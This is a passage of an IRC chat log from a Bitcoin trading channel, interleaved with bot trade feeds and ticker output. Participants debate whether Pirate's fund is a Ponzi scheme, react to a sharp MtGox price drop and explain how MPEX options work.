stricken by my speculation says something. Aug 19 13:44:25 BTC-Mining: wat is KRAKEN? Aug 19 13:44:33 EMOTIONALLY STRICKEN Aug 19 13:44:38 Anduck: Patrick Harnett's fund Aug 19 13:44:38 so what, he got a boner or something? Aug 19 13:44:38 It says you are not receptive to what the real truth is regardless if I am saying it or not. Aug 19 13:44:39 no, I am not emonitionally stricken Aug 19 13:44:44 [GLBSE] [PUREMINING] 15 @ 0.1051 = 1.5765 BTC [-] Aug 19 13:44:52 Anduck: well, KRAKEN is a passthrough Aug 19 13:44:56 You have an incentive for me to be wrong. Aug 19 13:45:02 My passthru to Patrick Harnett's fund, paying 0% - 2.5% a week Aug 19 13:45:06 ok Aug 19 13:45:10 your mom gave me an emotionally stricken. howza. Aug 19 13:45:19 Unlike pirate, I trust those rates to be real Aug 19 13:45:31 BTC-Mining: but not less than 0%? Aug 19 13:45:39 Not less than 0%, no Aug 19 13:46:02 I trust Patrick Harnett, although his support of pirate makes me trust him less than I would otherwise Aug 19 13:46:04 He backs it with the whole of his funds, if there's a loss, he'll pay from his money Aug 19 13:46:05 huh Aug 19 13:46:07 EmanuelDeOrtego: you just spamm this forum and this is a bit annoying. YTour drivel drowns most of the interesting information Aug 19 13:46:19 Spam is subjective. Aug 19 13:46:27 Interesting is subjective. Aug 19 13:46:28 I regret not buying out all of his capacity, and creating a passthrough Aug 19 13:46:33 so this is nao -otc Aug 19 13:46:35 bah. Aug 19 13:46:35 that is where the risk free profit is Aug 19 13:46:50 Hey... my money! Aug 19 13:47:01 Throw your own money, DiabloD3 =/ Aug 19 13:47:10 BTC-Mining: how many original IPO shares have you not sold yet? Aug 19 13:47:40 I haven't sold one yet... heck they've never been on sale so far. Aug 19 13:47:58 what, really? Aug 19 13:48:02 then what have I been buying? Aug 19 13:48:16 Are you talking about KRAKEN? Aug 19 13:48:25 no, btc-mining Aug 19 13:48:33 I have one question: Why would Pirate delay his payouts if he has all the Bitcoins ready in hand? Why would he pay the price of more scrutiny and calls for a ponzi just for an extra week of not paying? Aug 19 13:48:42 call of a* Aug 19 13:48:55 would you people use a stock exchange that didn't lag and looked professional and be very secure? Aug 19 13:48:57 It does not take a week to payout and already well-managed fund. Aug 19 13:49:03 an* Aug 19 13:49:04 because an actual ponzi? Aug 19 13:49:22 The likely case is that he does not have enough Bitcoins but has it all in USD. Aug 19 13:49:24 EmanuelDeOrtego: there is another channel for questions like this. Aug 19 13:49:29 go ask him Aug 19 13:49:33 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [-] Aug 19 13:49:50 [MPEX] [S.MPOE] 6747 @ 0.00036483 = 2.4615 BTC [-] Aug 19 13:49:50 EskimoBob: He wouldn't admit this because it would ruin it. Aug 19 13:49:51 [MPEX] [S.MPOE] 12600 @ 0.00036468 = 4.595 BTC [-] Aug 19 13:50:00 If he tells the market he needs to buyback Aug 19 13:50:04 We're back at 15 dollars Aug 19 13:50:23 We only need to look at the principles here Aug 19 13:50:28 so I guess he bought all the coin he needed :) LOL @ EmanuelDeOrtego Aug 19 13:50:37 so when will we see a rise in price again? Aug 19 13:50:46 Before next weeks payout Aug 19 13:51:19 As for your question DiabloD3, there's 7631 shares left for BTC-MINING Aug 19 13:51:25 would you people use a stock exchange that didn't lag and looked professional and be very secure? and be made by me Aug 19 13:51:26 EskimoBob: Can't be true because if he has the Bitcoins in hand, he would of already paid back his investors. Aug 19 13:51:46 Again, it's all a matter of principles. Aug 19 13:51:59 Good luck Anduck... Aug 19 13:52:02 BTC-Mining: man, I wish I could buy them all Aug 19 13:52:11 BTC-Mining: over the next three months Ill buy about 150 Aug 19 13:52:15 well Aug 19 13:52:21 assuming if someone else doesnt jump in there first Aug 19 13:52:28 It's costy, there's for about 100 000$ in IPO Aug 19 13:52:48 at least its keeping DMC going Aug 19 13:52:50 We've only got about $24000 so far Aug 19 13:54:26 DiabloD3: you are still buying mining turds? Have you learned anything over the past month or so? Aug 19 13:54:38 EskimoBob: I currently have none Aug 19 13:54:39 [GLBSE] [ASICMINER] 2 @ 0.099 = 0.198 BTC [+] Aug 19 13:54:54 Mining turds still have backing Aug 19 13:55:01 You just need to know how to manage that backing Aug 19 13:55:18 BTC-MINING is not a fixed mhash bond... Aug 19 13:55:19 EskimoBob: you do realize I hold 56 ghash in asicmining, right? Aug 19 13:55:53 56 hypothetical ghash Aug 19 13:55:58 56 GH of nothing as of now. In the future IF! they get the chip working - YES Aug 19 13:56:04 usagi: Anyways, yes, what I am not saying is not absolutely empirical. You just need to answer the question of why Pirate is delaying. Aug 19 13:56:12 what I am saying* Aug 19 13:56:13 EskimoBob: well, Im willing to take the risk Aug 19 13:56:14 At least someone thinks I am doing a good job, someone just bought 100 NYAN.B :) Thanks guys. Aug 19 13:56:24 I don't know why he is delaying. Aug 19 13:56:28 Maybe he isn't delaying? Aug 19 13:56:34 It makes sense that he pays on the usual day Aug 19 13:56:34 Emanuel, I'd personally say he needs time to disappear from the map but... Aug 19 13:56:39 usagi: You do your homework. Aug 19 13:56:42 Hopefully that won't be that case Aug 19 13:56:44 If he closes down it makes sense he will pay on that day as usual. Aug 19 13:57:11 You're likely right. It might just be tradition but it still seem unusual to me especially with everyone dogging him out. Aug 19 13:57:12 9.2 Aug 19 13:57:13 I talk to a lot of people and a lot of the people who are invested in me have a vested (hence the term) financial interest in making sure that I know what I need to know to keep their money safe. Aug 19 13:57:18 Even the coldest man still desires respect. Aug 19 13:57:25 and please, stop talking in Mm/s giga what ever. Difficulty eating it up faster than any infaltin east at any currency in the world Aug 19 13:57:57 I only know what I need to know, and personally, I trust pirate. Aug 19 13:58:13 I really hope you're right... Aug 19 13:58:17 Me too Aug 19 13:58:26 I do as well. I trust that he isn't a man that goes into the red or wants to payout of his own savings. Aug 19 13:58:45 I'd prefer a "Huge returns real in bitcoin world" news than "Yet another scam in bitcoin world" Aug 19 13:59:01 same here :) got a nice pile of BTC on that Aug 19 13:59:01 BTC-Mining don't worry, the former will never happen Aug 19 13:59:05 I trust he isn't a man that doesn't want his head blown off by a darknet assassin because he didn't pay. Aug 19 13:59:13 it'll be the later etiehr way. media knows which side's buttered Aug 19 13:59:16 that wants* Aug 19 13:59:26 darknet assasin ? gtfo. Aug 19 13:59:32 Darknet? Aug 19 13:59:36 lol Aug 19 13:59:50 you just took the road to funny farm ... for good Aug 19 13:59:51 So we can choose to be on the dark side or the light side? Aug 19 13:59:53 EmanuelDeOrtego: Aug 19 13:59:59 I like this idea Aug 19 14:00:02 Darknet = Tor Aug 19 14:00:07 lightnet assasin chick gives him a bj. Aug 19 14:00:11 I get to be a jedi now.. Or a sith. Aug 19 14:00:35 i'd ignopre the idiot but then the entire rest of you will keep ranting at him so i'd just end up with random garble. Aug 19 14:00:40 can we just get back to the topic ? Aug 19 14:00:46 Use my knowledge.. I beg you. And you can save your secret pirate investments, from certain death. Aug 19 14:00:49 EmanuelDeOrtego: you really need to call Jack Bauer. He will fix this Aug 19 14:01:09 mircea_popescu: Riddle me this: Why am I an idiot? Aug 19 14:01:23 EmanuelDeOrtego the darknet assasin comment sealed it. Aug 19 14:01:55 That's me trying to be funny but people know Pirate's real name. Aug 19 14:02:02 He is dead meat if he doesn't pay. Aug 19 14:02:05 omg I just found a diamond in minecraft! Aug 19 14:02:08 anyone want to bet pirate will not pay back everyone within 2 weeks? Aug 19 14:02:13 no, see ? you just did it again. Aug 19 14:02:22 this is why you're an idiot. Aug 19 14:02:48 Wha do you guys think. Can GLBSE IPO be used to set up a art studio? There will be divs when everything gets set up. IPO proceeds are used to buy equipment. Equipment actually produces revenue because people (not part of the studio) buy time to use it. Aug 19 14:02:49 [MPEX] [F.GIGA.ETF] 12300 @ 0.00098965 = 12.1727 BTC [-] Aug 19 14:03:04 [GLBSE] [TYGRR.BOND-P] 15 @ 0.665 = 9.975 BTC [-] Aug 19 14:03:05 Why am I an idiot? Because I believe Pirate's ability to function in the world is threatened if he goes bankrupt? Aug 19 14:03:22 Because I don't believe Pirate is god? Aug 19 14:03:24 EmanuelDeOrtego because you think that knowing someone's name and killing someone are even vaguely related. Aug 19 14:03:36 ponzi runner can easily hide. Aug 19 14:03:38 EmanuelDeOrtego and mircea_popescu get a priv room and go for it Aug 19 14:03:38 It was a sarcastic remark. Aug 19 14:03:38 did u know that? Aug 19 14:03:44 or just fuck off Aug 19 14:03:52 ya srlsy. Aug 19 14:04:04 EmanuelDeOrtego!*@* added to ignore list. Aug 19 14:04:43 and wtf is atlas? Aug 19 14:04:55 ;;ticker Aug 19 14:04:56 Best bid: 9.34996, Best ask: 9.34997, Bid-ask spread: 0.00001, Last trade: 9.34997, 24 hour volume: 128078, 24 hour low: 9.251, 24 hour high: 12.178 Aug 19 14:04:59 o hey. nine. Aug 19 14:05:02 ;;bids 9 Aug 19 14:05:02 Error: Failure to retrieve order book data. Try again later. Aug 19 14:05:05 o wow ? Aug 19 14:05:28 ;;bids 9 Aug 19 14:05:29 Error: Failure to retrieve order book data. Try again later. Aug 19 14:05:33 down for good eh. Aug 19 14:05:35 gribble needs to be assboted Aug 19 14:05:55 Actually, bitcoinchart is off too and MtGox is slow Aug 19 14:06:29 http://www.bitcoincharts.com/markets/mtgoxUSD.html Aug 19 14:06:35 Says we're still over 10 Aug 19 14:06:41 no Aug 19 14:06:52 it shows way below 9 Aug 19 14:06:54 10 Aug 19 14:07:42 [GLBSE] [ASICMINER] 4 @ 0.105 = 0.42 BTC [+] Aug 19 14:08:26 Oh, I meant the market depth part Aug 19 14:08:26 ya you prolly need to reload BTC-Mining Aug 19 14:08:29 a a Aug 19 14:08:40 which might be why gribble can't get bids/asks Aug 19 14:08:49 maybe that is unresponsive Aug 19 14:08:54 [GLBSE] [007] 1 @ 0.199 BTC [-] Aug 19 14:11:12 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.07120175 = 71.2018 BTC [+] Aug 19 14:11:20 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.16157212 = 161.5721 BTC [-] Aug 19 14:11:37 [GLBSE] [GIGAMINING] 6 @ 1.0259 = 6.1554 BTC [+] Aug 19 14:11:39 [GLBSE] [GIGAMINING] 14 @ 1.026 = 14.364 BTC [+] Aug 19 14:13:18 [GLBSE] [GIGAMINING] 6 @ 1.026 = 6.156 BTC [+] Aug 19 14:13:19 [GLBSE] [GIGAMINING] 4 @ 1.027 = 4.108 BTC [+] Aug 19 14:13:35 [GLBSE] [TYGRR.BOND-P] 8 @ 0.665 = 5.32 BTC [-] Aug 19 14:17:06 [GLBSE] [TYGRR.BOND-P] 77 @ 0.75 = 57.75 BTC [+] Aug 19 14:17:07 [GLBSE] [TYGRR.BOND-P] 34 @ 0.787 = 26.758 BTC [+] Aug 19 14:17:09 [GLBSE] [TYGRR.BOND-P] 47 @ 0.788 = 37.036 BTC [+] Aug 19 14:17:09 [GLBSE] [TYGRR.BOND-P] 42 @ 0.789 = 33.138 BTC [+] Aug 19 14:19:59 [GLBSE] [TEEK.USD] 3 @ 0.0814 = 0.2442 BTC [+] Aug 19 14:20:36 [MPEX] [F.GIGA.ETF] 2300 @ 0.00098563 = 2.2669 BTC [-] Aug 19 14:20:55 [GLBSE] [LTC-MINING] 5 @ 0.6 = 3 BTC [+] Aug 19 14:21:29 [GLBSE] [FPGAMINING] 2 @ 0.92 = 1.84 BTC [-] Aug 19 14:21:51 [GLBSE] [BITBOND] 1 @ 0.38 BTC [+] Aug 19 14:23:47 [GLBSE] [TYGRR.BOND-P] 6 @ 0.789 = 4.734 BTC [+] Aug 19 14:25:35 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.1602952 = 160.2952 BTC [-] Aug 19 14:25:44 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.07202061 = 72.0206 BTC [+] Aug 19 14:25:50 o hey, people buying collars now ? Aug 19 14:27:15 [MPEX] [S.BVPS] 250 @ 0.00379535 = 0.9488 BTC [-] Aug 19 14:27:15 [MPEX] [S.BVPS] 275 @ 0.00378534 = 1.041 BTC [-] Aug 19 14:27:17 [MPEX] [S.BVPS] 675 @ 0.00376575 = 2.5419 BTC [-] Aug 19 14:29:40 wow Aug 19 14:29:45 ;;ticker Aug 19 14:29:45 Best bid: 9.24999, Best ask: 9.25, Bid-ask spread: 0.00001, Last trade: 9.25, 24 hour volume: 134431, 24 hour low: 9.21, 24 hour high: 12.17477 Aug 19 14:29:54 totally missed that one. Aug 19 14:30:12 yeah. Aug 19 14:30:59 [MPEX] [O.BTCUSD.C100N] 1 @ 0.29482023 BTC [+] Aug 19 14:31:13 bought back too damn fast again Aug 19 14:31:51 same mistakes, always Aug 19 14:32:35 [MPEX] [O.BTCUSD.P140N] 69 @ 0.34826193 = 24.0301 BTC [+] Aug 19 14:32:42 lol Aug 19 14:32:46 don't try to time the market. Aug 19 14:33:14 [MPEX] [O.BTCUSD.P090T] 30 @ 0.02904109 = 0.8712 BTC [-] Aug 19 14:33:16 [MPEX] [O.BTCUSD.P090T] 20 @ 0.02562805 = 0.5126 BTC [-] Aug 19 14:33:17 [MPEX] [O.BTCUSD.P090T] 11 @ 0.02373254 = 0.2611 BTC [-] Aug 19 14:33:18 well the breaking of 10$ is what worries me Aug 19 14:34:10 [MPEX] [O.BTCUSD.P130T] 4 @ 0.21332463 = 0.8533 BTC [+] Aug 19 14:34:16 yeah i can see it. Aug 19 14:37:53 did u know that? Aug 19 14:38:00 ops Aug 19 14:38:01 missclick Aug 19 14:40:23 [MPEX] [O.BTCUSD.C070T] 1 @ 0.4247919 BTC [-] Aug 19 14:40:24 [MPEX] [O.BTCUSD.C120N] 1 @ 0.20738791 BTC [-] Aug 19 14:40:26 [MPEX] [O.BTCUSD.P040T] 6 @ 0.0265118 = 0.1591 BTC [+] Aug 19 14:40:27 [MPEX] [O.BTCUSD.P040T] 29 @ 0.02590221 = 0.7512 BTC [-] Aug 19 14:40:28 [MPEX] [O.BTCUSD.P040T] 28 @ 0.01847604 = 0.5173 BTC [-] Aug 19 14:40:30 [MPEX] [O.BTCUSD.P040T] 10 @ 0.01521074 = 0.1521 BTC [-] Aug 19 14:42:37 incredible wjhat 300k btc can do to the market lol Aug 19 14:43:10 ;;ticker Aug 19 14:43:11 Best bid: 8.89, Best ask: 8.999, Bid-ask spread: 0.10900, Last trade: 8.89, 24 hour volume: 139301, 24 hour low: 8.89, 24 hour high: 12.17477 Aug 19 14:43:19 [GLBSE] [TYGRR.BOND-P] 2 @ 0.7 = 1.4 BTC [-] Aug 19 14:43:27 [MPEX] [F.GIGA.ETF] 1600 @ 0.00098965 = 1.5834 BTC [+] Aug 19 14:43:45 [MPEX] [F.GIGA.ETF] 7600 @ 0.00100227 = 7.6173 BTC [+] Aug 19 14:43:46 [MPEX] [F.GIGA.ETF] 5325 @ 0.00100515 = 5.3524 BTC [+] Aug 19 14:43:56 course all the miner bonds are REALLY useless now Aug 19 14:44:05 yes Aug 19 14:44:09 so if you dont want them anymore Aug 19 14:44:12 Ill take them Aug 19 14:45:13 how's your acquisitions going btw ? Aug 19 14:45:14 next week or two is gonna be wicket i smell. Aug 19 14:45:28 wicked* Aug 19 14:45:40 mircea_popescu: well, I think people are pissed Im asking 15mh per trade now Aug 19 14:45:45 EmanuelDeOrtego: so? Aug 19 14:45:54 -_-` Aug 19 14:46:01 its not cool, Im trying to save bitcoin here Aug 19 14:46:05 so did you manage to trade anything ? Aug 19 14:46:09 the word you'r elooking for is awesome Aug 19 14:46:25 ;;ticker Aug 19 14:46:25 Best bid: 8.88273, Best ask: 8.89999, Bid-ask spread: 0.01726, Last trade: 8.89999, 24 hour volume: 138737, 24 hour low: 8.88273, 24 hour high: 12.17477 Aug 19 14:46:25 mircea_popescu: not much. Aug 19 14:46:32 DOWN WE GO Aug 19 14:46:48 it didn't change much from prev did it, the ticker i mean. Aug 19 14:46:59 [GLBSE] [GIGAMINING] 9 @ 1.027 = 9.243 BTC [+] Aug 19 14:47:19 bah Aug 19 14:47:26 clark moody still stuck at 10.8 Aug 19 14:47:31 sucks balls Aug 19 14:47:36 I guess predictinator was right Aug 19 14:47:39 it just had the wrong time scale Aug 19 14:47:44 i tell you this has been my largest month to date for options. Aug 19 14:48:30 ;;ticker Aug 19 14:48:30 Best bid: 8.84729, Best ask: 8.8494, Bid-ask spread: 0.00211, Last trade: 8.8494, 24 hour volume: 137908, 24 hour low: 8.8494, 24 hour high: 12.17477 Aug 19 14:48:55 2k aint shit Aug 19 14:49:09 2k what ? Aug 19 14:49:16 I wanted to get all my BTC out to sell them at 15$... couldn't make it Aug 19 14:49:25 OVER NINE THOUSAND Aug 19 14:49:26 came back from work and it was down to 12 Aug 19 14:49:34 sucks lol Aug 19 14:49:54 BTC-Mining you should have sold puts :D Aug 19 14:50:38 [GLBSE] [ASICMINER] 95 @ 0.105 = 9.975 BTC [+] Aug 19 14:50:54 basis? basis is to buy them back at a lower rate Aug 19 14:51:11 http://bitcoincharts.com/markets/mtgoxUSD_depth.html << i think mtgox has frozen api Aug 19 14:51:16 cause clarkmoody stuck in same spot Aug 19 14:51:17 hi all Aug 19 14:51:20 hi. Aug 19 14:51:37 ;;ticker Aug 19 14:51:37 Best bid: 8.87823, Best ask: 8.9, Bid-ask spread: 0.02177, Last trade: 8.99999, 24 hour volume: 137433, 24 hour low: 8.831, 24 hour high: 12 Aug 19 14:51:40 ;;tslb Aug 19 14:51:44 i was just wandering; is there a way to buy call/put options somewhere in bitcoin economy? Aug 19 14:51:45 Time since last block: 3 minutes and 57 seconds Aug 19 14:51:56 elementz http://polimedia.us/bitcoin/mpex.php Aug 19 14:52:22 it's in the chanel topic, too Aug 19 14:52:31 but i guess nobody reads topics anymore Aug 19 14:52:33 oh yeah looked into that. looks really complicated ;-) Aug 19 14:52:49 ;;ticker Aug 19 14:52:50 Best bid: 8.87823, Best ask: 8.9, Bid-ask spread: 0.02177, Last trade: 8.99999, 24 hour volume: 137433, 24 hour low: 8.831, 24 hour high: 12 Aug 19 14:52:52 well i don't know that there's simpler ways. Aug 19 14:52:53 hm Aug 19 14:52:58 mtg says 9 Aug 19 14:52:59 :p Aug 19 14:53:10 what about otc? are there people doing it? Aug 19 14:53:32 not really. some people do options for stocks ocasionally, but it's in general among trusted parties. Aug 19 14:53:35 bids are being removed... Aug 19 14:53:45 ok Aug 19 14:53:53 what if this isn't really a pirate thing but gox got hacked again !? Aug 19 14:54:00 [GLBSE] [YABMC] 3 @ 0.1248 = 0.3744 BTC [-] Aug 19 14:54:02 [GLBSE] [YABMC] 13 @ 0.1249 = 1.6237 BTC [+] Aug 19 14:54:03 so the only way would be via mpex. Aug 19 14:54:23 elementz the simpler way, anyway. Aug 19 14:54:28 [GLBSE] [PIMP] 58 @ 0.15 = 8.7 BTC [+] Aug 19 14:55:05 ZETA-MINING: dividends for week 33.2012 paid early Aug 19 14:55:18 BTC-Mining from where? Aug 19 14:55:21 [MPEX] [O.BTCUSD.P130T] 700 @ 0.30782685 = 215.4788 BTC [+] Aug 19 14:55:44 mtgox live Aug 19 14:55:54 10k just got removed Aug 19 14:56:26 I don't mind price going down, I'll buy some more at 4-5 like in the good old days. Aug 19 14:56:53 Mine too Aug 19 14:57:38 :( 8.91371 USD Aug 19 14:57:48 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.21618514 = 216.1851 BTC [+] Aug 19 14:58:04 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.13794295 = 137.943 BTC [+] Aug 19 14:58:12 9.02632 :) Aug 19 14:58:14 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.07816983 = 78.1698 BTC [+] Aug 19 14:58:35 doubt it will hold Aug 19 14:58:48 [MPEX] [O.BTCUSD.P090T] 1000 @ 0.05243851 = 52.4385 BTC [+] Aug 19 15:00:23 [MPEX] [O.BTCUSD.C190N] 4 @ 0.09904921 = 0.3962 BTC [-] Aug 19 15:00:23 [MPEX] [O.BTCUSD.C090N] 1 @ 0.34620574 BTC [+] Aug 19 15:00:25 [MPEX] [O.BTCUSD.C100N] 3 @ 0.28788494 = 0.8637 BTC [-] Aug 19 15:00:41 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.14378959 = 143.7896 BTC [+] Aug 19 15:00:57 i would guess we're gonna sit around nine from now on. Aug 19 15:01:07 ;;ticker Aug 19 15:01:07 Best bid: 9.03998, Best ask: 9.03999, Bid-ask spread: 0.00001, Last trade: 9.03999, 24 hour volume: 139125, 24 hour low: 8.831, 24 hour high: 12 Aug 19 15:01:14 ;;asks 10 Aug 19 15:01:14 Error: Failure to retrieve order book data. Try again later. Aug 19 15:02:10 mtgox is changes UI so much I can not find the orderbook :) Aug 19 15:03:27 [GLBSE] [GIGAMINING] 2 @ 1.01 = 2.02 BTC [-] Aug 19 15:03:29 [GLBSE] [GIGAMINING] 4 @ 1.0051 = 4.0204 BTC [-] Aug 19 15:03:30 [GLBSE] [GIGAMINING] 5 @ 1.0051 = 5.0255 BTC [-] Aug 19 15:03:31 [GLBSE] [GIGAMINING] 5 @ 0.992 = 4.96 BTC [-] Aug 19 15:03:33 [GLBSE] [GIGAMINING] 1 @ 0.9912 BTC [-] Aug 19 15:03:33 [GLBSE] [GIGAMINING] 2 @ 0.991 = 1.982 BTC [-] Aug 19 15:03:34 [GLBSE] [GIGAMINING] 41 @ 0.97 = 39.77 BTC [-] Aug 19 15:04:18 [MPEX] [F.GIGA.ETF] 10212 @ 0.00099409 = 10.1516 BTC [-] Aug 19 15:04:19 [MPEX] [F.GIGA.ETF] 7900 @ 0.00099247 = 7.8405 BTC [-] Aug 19 15:04:20 [MPEX] [F.GIGA.ETF] 800 @ 0.00098563 = 0.7885 BTC [-] Aug 19 15:04:21 [MPEX] [F.GIGA.ETF] 5064 @ 0.00098505 = 4.9883 BTC [-] Aug 19 15:04:22 [MPEX] [F.GIGA.ETF] 14016 @ 0.00097996 = 13.7351 BTC [-] Aug 19 15:04:23 [MPEX] [F.GIGA.ETF] 2200 @ 0.00097991 = 2.1558 BTC [-] Aug 19 15:04:24 [MPEX] [F.GIGA.ETF] 10800 @ 0.00097931 = 10.5765 BTC [-] Aug 19 15:04:25 [MPEX] [F.GIGA.ETF] 17000 @ 0.00097778 = 16.6223 BTC [-] Aug 19 15:04:27 [MPEX] [F.GIGA.ETF] 7889 @ 0.00096869 = 7.642 BTC [-] Aug 19 15:04:27 [MPEX] [F.GIGA.ETF] 4119 @ 0.00096853 = 3.9894 BTC [-] Aug 19 15:06:01 [GLBSE] [OBSI.HRPT] 100 @ 0.096 = 9.6 BTC [-] Aug 19 15:07:13 ;;ticker Aug 19 15:07:14 Best bid: 9.12378, Best ask: 9.12379, Bid-ask spread: 0.00001, Last trade: 9.12379, 24 hour volume: 139768, 24 hour low: 8.831, 24 hour high: 12 Aug 19 15:07:18 omg rally! Aug 19 15:07:24 all the way to 15! YAAA Aug 19 15:07:26 gogogo Aug 19 15:08:19 [MPEX] [S.MPOE] 35153 @ 0.00036457 = 12.8157 BTC [-] Aug 19 15:08:21 [MPEX] [S.MPOE] 27949 @ 0.00036997 = 10.3403 BTC [+] Aug 19 15:09:07 [MPEX] [S.MPOE] 11000 @ 0.00036308 = 3.9939 BTC [-] Aug 19 15:09:08 [MPEX] [S.MPOE] 11714 @ 0.00036299 = 4.2521 BTC [-] Aug 19 15:09:43 ;;ticker Aug 19 15:09:43 Best bid: 9.17, Best ask: 9.19, Bid-ask spread: 0.02000, Last trade: 9.19, 24 hour volume: 141252, 24 hour low: 8.831, 24 hour high: 12 Aug 19 15:10:34 oya! Aug 19 15:10:41 [GLBSE] [PPT.A] 13 @ 1.18 = 15.34 BTC [+] Aug 19 15:11:11 so does anyone know, when the pirate bond really picked up traction? can it be correlated with the pricetrend over the last year somehow? did anybody try this at all? Aug 19 15:11:34 elementz the various bonds offered on pirate are really a tiny part of the pie. Aug 19 15:11:52 maybe 10% or so. Aug 19 15:12:13 ok, so how big was the whole pirate operation though? Aug 19 15:12:20 people claim around 500k Aug 19 15:12:27 btc Aug 19 15:12:27 the bonds never did 50k afaik. Aug 19 15:12:44 wow is the price of BTC dropping like a rock Aug 19 15:12:59 no actually now it's rallying nefario . dropped earlier to ~8.x Aug 19 15:13:15 hm. so how many btc exist all in a atm? Aug 19 15:13:24 ;;bc,totalbtc Aug 19 15:13:24 Error: "bc,totalbtc" is not a valid command. Aug 19 15:13:28 ;;bc,totalbc Aug 19 15:13:29 HTTP Error 500: Internal Server Error Aug 19 15:13:44 9 million or so Aug 19 15:13:47 iirc Aug 19 15:13:48 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.14600797 = 146.008 BTC [+] Aug 19 15:14:16 9.7mn Aug 19 15:15:05 ;;ticker Aug 19 15:15:05 Best bid: 9.21199, Best ask: 9.262, Bid-ask spread: 0.05001, Last trade: 9.262, 24 hour volume: 142645, 24 hour low: 8.831, 24 hour high: 12 Aug 19 15:15:50 hmm. so about 5.5% percent of total btc were tied up in pirates operation. Aug 19 15:16:19 .py 500 / 9700 Aug 19 15:16:22 !ticker Aug 19 15:16:22 0 Aug 19 15:16:22 Provide ticker. Aug 19 15:16:30 that's right. 0%. :D Aug 19 15:17:21 so how come he could move the price so much then? if he actually did that at all Aug 19 15:17:45 the total volume of past 3 days was about 300k Aug 19 15:18:04 mt gox is really not the be all-end all. plenty of btc moves otc etc. Aug 19 15:18:37 but i guess most people use mtgox as a reference for their price, no? Aug 19 15:18:56 many people do, yes. Aug 19 15:19:10 it's a pretty good reference in general, just, it's not gospel is all. Aug 19 15:19:37 k Aug 19 15:20:10 that aside, if i were to sell 5.5% of any stock it would drop significantly too. Aug 19 15:20:41 it doesn't happen irl because the people who own that much are sane and don't do this sort of shit Aug 19 15:21:02 and the reason that is the case is the fact that irl people don't just hand their money to any random dood. Aug 19 15:21:07 btc still has a lot to learn. Aug 19 15:21:10 "plenty of btc moves otc etc" - seriously? Aug 19 15:21:15 EskimoBob yes. Aug 19 15:21:30 [GLBSE] [PPT.A] 5 @ 1.0001 = 5.0005 BTC [-] Aug 19 15:21:50 ;;ticker Aug 19 15:21:51 Best bid: 9.35614, Best ask: 9.3989, Bid-ask spread: 0.04276, Last trade: 9.4, 24 hour volume: 143134, 24 hour low: 8.831, 24 hour high: 12 Aug 19 15:22:02 [GLBSE] [PPT.A] 10 @ 1 = 10 BTC [-] Aug 19 15:22:25 are you adding all non exchange transactions to OTC? Aug 19 15:22:47 yes. Aug 19 15:22:57 seeing how that's what otc means. Aug 19 15:23:03 i didn't mean -otc as in the cesspool. Aug 19 15:25:40 This is not really accurate Aug 19 15:26:05 because you have no idea WHY coins are moved Aug 19 15:26:27 [GLBSE] [GIGAMINING] 1 @ 1.027 BTC [+] Aug 19 15:26:48 i didn't mean "all transactions seen in the blockchain" Aug 19 15:26:58 i meant transactions in the financial sense, btc for usd or what have you Aug 19 15:27:17 [GLBSE] [YABMC] 10 @ 0.12 = 1.2 BTC [-] Aug 19 15:27:19 [GLBSE] [YABMC] 1 @ 0.112 BTC [-] Aug 19 15:27:20 [GLBSE] [YABMC] 1 @ 0.11 BTC [-] Aug 19 15:28:07 [GLBSE] [GIGAMINING] 2 @ 1.027 = 2.054 BTC [+] Aug 19 15:29:14 [MPEX] [S.MPOE] 8042 @ 0.00036997 = 2.9753 BTC [+] Aug 19 15:29:16 [MPEX] [S.MPOE] 17958 @ 0.00037987 = 6.8217 BTC [+] Aug 19 15:34:44 [GLBSE] [TYGRR.BOND-P] 14 @ 0.795 = 11.13 BTC [+] Aug 19 15:35:17 [GLBSE] [TYGRR.BOND-P] 2 @ 0.79859997 = 1.5972 BTC [+] Aug 19 15:35:19 [GLBSE] [TYGRR.BOND-P] 5 @ 0.799 = 3.995 BTC [+] Aug 19 15:35:37 [GLBSE] [TYGRR.BOND-P] 75 @ 0.799 = 59.925 BTC [+] Aug 19 15:35:39 [GLBSE] [TYGRR.BOND-P] 5 @ 0.799 = 3.995 BTC [+] Aug 19 15:36:52 mircea_popescu: so to get back to mpex; so i could buy a low volume put option there? lets say 5btc. are there any options with a short term expiration date? Aug 19 15:37:33 this might be a dumb question, but looking at the site i am a bit lost ;-) Aug 19 15:38:51 you're not dumb Aug 19 15:39:35 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8 BTC [+] Aug 19 15:39:37 [GLBSE] [TYGRR.BOND-P] 2 @ 0.8 = 1.6 BTC [+] Aug 19 15:47:16 any experience with cryptostocks.com ? Aug 19 15:48:27 [MPEX] [S.MPOE] 21359 @ 0.00037987 = 8.1136 BTC [+] Aug 19 15:48:28 [MPEX] [S.MPOE] 13641 @ 0.00038047 = 5.19 BTC [+] Aug 19 16:00:38 [MPEX] [O.BTCUSD.C140N] 2 @ 0.15104119 = 0.3021 BTC [-] Aug 19 16:02:42 elementz options expire the current and the next month. the current ones are T Aug 19 16:03:06 and you can buy in 1 btc increments (each option contract is for 1 btc). so depending what you want exactly 5btc will buy you a few. Aug 19 16:04:16 [GLBSE] [GIGAMINING] 198 @ 1.027 = 203.346 BTC [+] Aug 19 16:05:07 ;;ticker Aug 19 16:05:07 Best bid: 9.57, Best ask: 9.64999, Bid-ask spread: 0.07999, Last trade: 9.64999, 24 hour volume: 142025, 24 hour low: 8.831, 24 hour high: 12 Aug 19 16:05:23 heh i'm guessing he didnt get that then huh. Aug 19 16:05:56 [GLBSE] [GIGAMINING] 20 @ 0.97000001 = 19.4 BTC [-] Aug 19 16:05:58 [GLBSE] [GIGAMINING] 5 @ 0.97 = 4.85 BTC [-] Aug 19 16:05:58 [GLBSE] [GIGAMINING] 30 @ 0.961 = 28.83 BTC [-] Aug 19 16:06:00 [GLBSE] [GIGAMINING] 3 @ 0.96 = 2.88 BTC [-] Aug 19 16:06:01 [GLBSE] [GIGAMINING] 1 @ 0.942 BTC [-] Aug 19 16:06:02 [GLBSE] 